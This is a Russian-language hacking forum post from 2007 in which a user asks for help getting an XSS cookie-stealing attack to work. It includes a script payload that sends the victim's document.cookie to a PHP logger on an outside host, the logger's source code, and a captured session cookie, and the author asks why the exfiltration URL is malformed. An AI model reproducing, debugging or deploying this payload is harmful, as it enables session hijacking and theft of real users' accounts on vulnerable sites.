04.03.2007, 15:37
|
|
Новичок
Регистрация: 28.12.2006
Сообщений: 6
С нами:
10194133
Репутация:
0
|
|
Нужна помощь. Видать в запросе...
Народ, помогайте, запарился чета)
Вот вобщем, нашёл место куда сувать XSS.
Кидаю вот что:
PHP код:
<script&qt; document.location.href="http://www.humora.net.ru/Files/sniff.php"+ document.cookie; </script&qt;
Где sniff.php содержит такие строки:
PHP код:
<?
$f = fopen("snif.txt", "a");
fwrite($f, $REQUEST_URI);
fclose($f);
print("OK");
?&qt;
И в итоге, чтобы записать мои куки, снифером, в snif.txt, меня перебрасывает на страницу:
http://www.humora.net.ru/Files/sniff.phpASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBA IEAD
где
ASPSESSIONIDQSDSCRCT=DDPADKADEMNCFJPKCHBAIEAD - это и есть document.cookie 
Подскажите че нетак, плиз, а то не знаю уже че за фигня |
|
|